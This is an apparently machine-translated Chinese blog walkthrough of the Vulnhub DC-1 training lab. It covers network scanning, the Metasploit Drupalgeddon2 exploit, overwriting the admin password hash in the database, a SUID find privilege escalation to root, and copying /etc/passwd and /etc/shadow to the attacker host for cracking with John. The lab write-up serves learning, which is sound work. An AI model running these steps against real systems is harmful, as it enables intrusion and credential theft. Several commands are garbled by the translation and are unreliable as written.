vulhub怎么使用,vulhub通关教程

  vulhub怎么使用,vulhub通关教程

  Vulnhub 1-DC简介:1前言为了更好的了解Kali渗透测试,我最近接触了Volunhub平台,一个免费提供漏洞目标飞行器进行渗透测试的平台。

  准备DC:1无人机下载。

  Kali系统(本实验使用Kali-Linux-2020-3-Live-AMD64-ISO)

  目标机导入,VirtualBox和VMware都可以。

  准备虚拟机,将目标无人机DC:1和攻击机kali系统设置在同一个局域网内。本实验采用(NAT模式)

  目的验证DC 1号在实验中的引入。

  DC-1是一个专门建造的易受攻击的实验室,目的是获得渗透测试领域的经验。它的难度取决于你的技能知识和学习能力。要成功完成这项挑战,您需要具备Linux技能,熟悉Linux命令行,并具备基本渗透测试工具的经验。

  总共有五个标志,但最终目的是找到并读取根目录的主目录中的标志。您甚至不需要成为root用户来执行此操作,但是,您将需要root权限。

  实验性局域网扫描:sudo arp-scan -l

  不知道目标机的IP,先用arp扫描局域网。

  已知扫描目标无人机DC:1的IP地址为192.168.11.142。

  扫描端口以收集信息:sudo nmap 192.168.11.142

  已知扫描DC:1的TCP端口22、80、111是开放的,从端口推断目标机器已经启动了web服务。

  得出结论,使用Drupal搭建网站,搜索Drupal相关信息后进行下一步工作。

  扫描漏洞并准备攻击。使用msf工具

  漏洞搜索:搜索drupal

  Drupal根据无人机的网站进行搜索。

  漏洞利用:use exploit/UNIX/web app/Drupal _ drupalgeddon 2

  可以依次进行攻击,最后成功攻击这个漏洞。

  请参见参数选项显示选项

  设置攻击域名,开始攻击。

  设置rhosts 192.168.11.142漏洞

  提示Meterpreter session 1打开,表示攻击成功,输入目标飞机。

  进入目标无人机,进入shell,然后进入shell环境,查看文件,输入ls,找到目标文件flag1.txt

  检查flag1.txt

  干得好。您可能需要一个配置文件。根据这个提示,目标flag2应该在一个配置文件中。根据启动的web服务,下一个目标应该是web服务的配置文件。

  查找www配置文件,一般查看配置文件需要权限。此时通过python弹起一个终端,获得普通用户权限:

  python-c import pty;Pty.spawn(/困惑的声音/sh )

  输入www配置文件。

  成功找到标志2:

  暴力攻击和字典攻击并不是获得访问权限的唯一方法(您将需要访问权限)。这些代金券可以用来做什么?

  这里提示我们需要权限,可能是因为我们想获得root权限或者访问drupal网站。

  尝试破解密码,登录drupal网站。

  8.1根据数据库用户dbuser和flag2文件中的密码R0ck3t登录数据库。

  8.2查看数据库内容:显示数据库,

  进入数据库并查看表单内容:使用drupaldb,显示表格。

  没有获得明显有用的内容。

  8.3尝试查询数据库,查询所有用户:select * from user

  8.4尝试更改用户admin的密码。

  更新数据库中的源密码,并加载加密脚本以生成密码的哈希值。

  PHP/var/www/scripts/password-hash . sh密码

  加密脚本位于网站根目录下的scripts下,生成密码哈希值替换。

  替换:更新drupaldb.users集pass

  = $ S $DgNSiYzRbilwq18C5。d/pnvrvdokncm 5 w xbg 7 aidqwfnkdi 0 tjcl 其中name=" admin

  登录网站查找内容(管理员密码)

  找到目标标志3并查看内容。

  特殊的PERMS将有助于找到密码-但你将需要命令执行,以确定如何获得隐藏的内容。

  系统会提示我们获取权限以查看阴影中的内容。

  获取root权限。

  SUID是一种特殊的文件属性,它允许用户执行的文件以文件所有者的身份运行。查找SUID文件:

  find/-user root-perm-4000-print 2/dev/null

  找到“查找”命令。

  通过find命令获得root权限:mkdir abc

  ABC-exec /混乱的声音/嘘;

  成功获得root权限,并成功提升权限。

  检查/etc/shadow文件。

  发现目标标志4

  检查/etc/passwd文件。

  破解flag4密码

  连接本地服务器,发回/etc/passwd和/etc/shadow文件进行破解。

  连接到本地服务器并构建ssh服务。

  编辑ssh配置文件并启动服务。

  找到# permitrootlogin禁止密码,删除之前的#,并将“禁止密码”更改为“是”。

  找到PasswordAuthentication行,并删除它前面的#注释。如果后面说不是,那就需要修改成是。

  打开ssh服务:sudo服务ssh启动

  归还文件并破解它。

  scp/etc/passwd kali @ 192 . 168 . 11 . 143:/home/kali/Desktop

  scp/etc/shadow kali @ 192 . 168 . 11 . 143:/home/kali/桌面

  使用unshadow命令将文件合并为一个文件。

  先创建文件dopass,进入桌面,打开终端,因为返回的文件在桌面上。合并文件

  sudo unshadow passwd shadow dopass

  破解,用卡莉自己的约翰破解。有一个简单的方法来使用其他解密。

  苏多约翰多帕斯

  获取flag4的密码是橙色的

  登录无人机DC:1

  ssh flag4@192.168.11.142

  查找并查看文件。

  系统会提示我们以同样的方式获取root权限。

  获取root权限。

  根据提示,转到/root查看最终目标。

  找到终极目标,查查内容,发现是作者的鼓励。这意味着我们成功实现了穿透目标无人机的目标。总之,通过攻击目标无人机DC:1,我更熟悉卡利的工具和命令的使用。

  在渗透的过程中,不断学习,积累经验,从而得到成长。最后,我们成功实现了五个目标。

  学习的过程就是不断的探索,所以继续加油吧!

  并且感谢大家推荐的文章,Linux提电各种姿势总结。

  Kali中msf的简单开发

  如何破解linux用户账号密码一

  Kali打开ssh服务。

  使用开膛手约翰破解密码

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

留言与评论(共有 条评论)
   
验证码: